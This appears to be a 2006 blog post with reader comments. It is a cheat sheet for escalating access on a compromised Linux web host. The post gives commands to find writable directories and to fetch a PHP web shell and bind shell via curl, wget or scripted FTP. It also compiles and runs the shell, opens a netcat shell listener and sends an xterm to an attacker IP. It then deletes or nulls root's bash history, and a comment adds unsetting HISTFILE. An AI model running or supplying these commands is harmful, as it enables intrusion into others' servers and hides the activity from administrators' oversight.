Tuesday, October 17, 2006

escalation

interesting hack by h3llfyr3
http://www.h4cki.org/index.php?title=From_a_4Images_SQL_Injection_to_Root_Access_-_Privilage_Escalation

also some cool hack from they peers!
find . -perm -2 -ls

The dot being what directory to search, so I would suggest doing:

cd /home/user/public_html/;find . -perm -2 -ls

It will then give you a list of folders and files that are writeable .. Dont forget that there are other downloaders than wget .. Doing the following command will show you what downloaders are running on the box:

which wget curl w3m lynx

For wget:

wget --directory-prefix=[DIR HERE, NO EXTENSION] [URL HERE]

For curl:

curl -o /home/user/public_html/shell.php http://www.shell.txt


cat >bindshell.c
curl -o /home/user/public_html/bindshell.c http://www.server.com/bindshell.c
gcc bindshell.c -o bindshell
./bindshell

echo open 10.0.0.1 > file.txt
echo lcd /writeable/web/dir/ >> file.txt <--this swaps your local directory to one you can write to
echo user anonymous >> file.txt
echo pass anonymous@anon.com >> file.txt
echo get bindshell.c >>file.txt
echo bye >>file.txt
to execute
ftp < file.txt


Other common tech for RSH
tftp -i attacker_ip file (nc)

nc -e /bin/sh -l -p port_number (-DGAPING_SECURITY_HOLE MUST BE compiled)

if victim host has X terminal such as xterm
xterm -display attack_ip:0.0 &

check last 20 entries in history
tail -20 /root/.bash_history

And to remove current .bash_history
rm -rf /root/.bash_history

disable command logging
ln -s /dev/null /root/.bash_history

2 comments:

Anonymous said...

Would'nt recommend this
> disable command logging
>ln -s /dev/null /root/.bash_history

it leaves a syn link to /dev/null any competant admin will realise it's purpose.

My preference
unset HISTFILE;unset SAVEHIST

insistkool said...

Thanks, this is better!